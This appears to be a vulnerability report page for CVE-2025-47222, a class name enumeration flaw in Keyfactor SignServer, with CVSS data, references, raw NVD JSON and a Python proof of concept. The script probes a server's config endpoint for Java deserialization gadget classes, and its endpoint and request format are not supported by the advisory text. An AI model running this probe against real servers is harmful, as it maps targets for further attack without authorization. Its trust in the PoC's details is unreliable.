Security Vulnerability Report
CVE-2025-47222 CVSS 6.5 MEDIUM

CVE-2025-47222

Published: 2025-11-13 21:15:50
Last Modified: 2025-12-17 20:15:55

Description

A class name enumeration issue was found in Keyfactor SignServer versions prior to 7.3.2. Setting an arbitrary class name on any of the properties that require a class path is not expected to produce different errors depending on whether the class exists in the deployment, but it does. This discloses to the client side which classes are, or are not, loaded in the application.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:keyfactor:signserver:*:*:*:*:*:*:*:* - VULNERABLE
Keyfactor SignServer < 7.3.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-47222 Class Name Enumeration PoC
# Target: Keyfactor SignServer < 7.3.2
# Vulnerability: Class name enumeration leading to information disclosure
import requests

TARGET_URL = "http://target-server:8080/signserver"

# Class names probed for; each probe is answered differently depending on
# whether the class is present in the deployment (the information leak).
COMMON_CLASSES = [
    "org.apache.commons.io.FileUtils",
    "org.apache.log4j.Logger",
    "org.springframework.web.context.ContextLoaderListener",
    "com.sun.rowset.JdbcRowSetImpl",
    "org.apache.commons.collections.Transformer",
    "org.apache.shiro.subject.SimplePrincipalCollection",
    "com.fasterxml.jackson.databind.ObjectMapper",
    "org.bouncycastle.jce.provider.BouncyCastleProvider",
    "org.opensaml.xml.parse.StaticBasicParserPool",
]


def test_class_enumeration():
    """Test for class name enumeration vulnerability."""
    results = []
    for class_name in COMMON_CLASSES:
        try:
            # Endpoint and request body as used in the original PoC
            payload = {"className": class_name, "workerType": "SomeWorker"}
            response = requests.post(
                f"{TARGET_URL}/config",
                json=payload,
                timeout=10,
                verify=False,
            )
            # Analyze response to determine if class exists
            if response.status_code == 200:
                if "class not found" not in response.text.lower():
                    results.append({
                        "class": class_name,
                        "exists": True,
                        "response_length": len(response.text),
                    })
                else:
                    results.append({
                        "class": class_name,
                        "exists": False,
                        "response_length": len(response.text),
                    })
        except Exception as e:
            print(f"Error testing {class_name}: {e}")
    return results


if __name__ == "__main__":
    print("CVE-2025-47222 Class Name Enumeration Test")
    print("=" * 50)
    results = test_class_enumeration()
    for r in results:
        status = "EXISTS" if r["exists"] else "NOT FOUND"
        print(f"{r['class']}: {status}")
```

References

https://docs.keyfactor.com/signserver/latest/signserver-7-3-release-notes (Release Notes)
https://support.keyfactor.com (Product)
https://support.keyfactor.com/hc/en-us/articles/37639174814235-SignServer-CVE-2025-47222-Class-name-enumeration

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-47222",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-13T21:15:49.707",
    "lastModified": "2025-12-17T20:15:55.297",
    "vulnStatus": "Modified",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A class name enumeration was found in Keyfactor SignServer versions prior to 7.3.2. Setting any chosen class name to any of the properties requiring a class path and the provided class is not expected to return different errors if the class exists in deployment or not. This returns information about the classes loaded in the application or not to the clientside."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-284"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:keyfactor:signserver:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "7.3.1",
                "matchCriteriaId": "D27BE713-6FAA-452D-BDD4-784A8FEF0801"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://docs.keyfactor.com/signserver/latest/signserver-7-3-release-notes",
        "source": "[email protected]",
        "tags": ["Release Notes"]
      },
      {
        "url": "https://support.keyfactor.com",
        "source": "[email protected]",
        "tags": ["Product"]
      },
      {
        "url": "https://support.keyfactor.com/hc/en-us/articles/37639174814235-SignServer-CVE-2025-47222-Class-name-enumeration",
        "source": "[email protected]"
      }
    ]
  }
}
```